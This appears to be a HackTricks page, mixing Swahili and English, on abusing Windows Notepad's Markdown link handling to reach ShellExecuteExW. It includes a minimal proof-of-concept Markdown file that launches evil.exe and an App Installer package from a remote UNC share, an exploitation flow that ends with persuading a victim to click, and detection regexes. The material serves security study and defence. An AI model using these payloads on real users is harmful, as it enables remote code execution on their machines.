Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).
Support HackTricks
- Angalia subscription plans!
- Jiunge na ๐ฌ Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
- Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.
Programu za kisasa za Windows zinazotafsiri Markdown/HTML mara nyingi hubadilisha viungo vilivyoingizwa na mtumiaji kuwa vipengele vinavyoweza kubofyanwa na kuvituma kwenye ShellExecuteExW. Bila orodha ya ruhusa ya schemes yenye ukali, protocol handler yoyote iliyosajiliwa (mfano, file:, ms-appinstaller:) inaweza kuanzishwa, ikisababisha utekelezaji wa code katika muktadha wa mtumiaji wa sasa.
ShellExecuteExW surface in Windows Notepad Markdown mode
- Notepad huchagua Markdown mode tu kwa
.mdextensions kupitia kulinganisha kamba ya fasta katikasub_1400ED5D0(). - Supported Markdown links:
- Standard:
[text](target) - Autolink:
<target>(huonyeshwa kama[target](target)), hivyo miundo yote miwili ni muhimu kwa payloads na utambuzi. - Link clicks are processed in
sub_140170F60(), ambayo hufanya uchujaji dhaifu kisha inaitaShellExecuteExW. ShellExecuteExWdispatches to any configured protocol handler, not just HTTP(S).
Payload considerations
- Any
\\sequences in the link are normalized to\beforeShellExecuteExW, ikioathiri UNC/path crafting na utambuzi. .mdfiles are not associated with Notepad by default; waathiriwa bado lazima afungue faili katika Notepad na kubofya kiungo, lakini mara inapoonyeshwa, kiungo kinaweza kubofyanwa.- Dangerous example schemes:
file://to launch a local/UNC payload.ms-appinstaller://to trigger App Installer flows. Schemes nyingine zilizojisajili ndani pia zinaweza kutumika vibaya.
Minimal PoC Markdown
[run](file://\\192.0.2.10\\share\\evil.exe)
<ms-appinstaller://\\192.0.2.10\\share\\pkg.appinstaller>
Exploitation flow
- Craft a
.mdfile so Notepad renders it as Markdown. - Embed a link using a dangerous URI scheme (
file:,ms-appinstaller:, or any installed handler). - Deliver the file (HTTP/HTTPS/FTP/IMAP/NFS/POP3/SMTP/SMB or similar) and convince the user to open it in Notepad.
- On click, the kiungo kilichosawazishwa is handed to
ShellExecuteExWand the corresponding protocol handler executes the referenced content in the userโs context.
Mawazo ya kugundua
- Fuatilia uhamisho wa faili za
.mdkupitia bandari/itifaki ambazo kawaida husambaza nyaraka:20/21 (FTP),80 (HTTP),443 (HTTPS),110 (POP3),143 (IMAP),25/587 (SMTP),139/445 (SMB/CIFS),2049 (NFS),111 (portmap). - Changanua viungo vya Markdown (standard na autolink) na tafuta
file:aums-appinstaller:bila kuzingatia herufi kubwa/ndogo. - Regex zinazoongozwa na vendor ili kugundua ufikiaji wa rasilimali za mbali:
(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
- Tabia ya patch iliripotiwa inaoruhusu faili za ndani na HTTP(S); chochote kingine kinachofikia
ShellExecuteExWni cha kutiliwa shaka. Panua utambuzi kwa protocol handlers nyingine zilizosanikishwa inapohitajika, kwani attack surface inatofautiana kulingana na mfumo.
Marejeo
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).
Support HackTricks
- Angalia subscription plans!
- Jiunge na ๐ฌ Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
- Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.


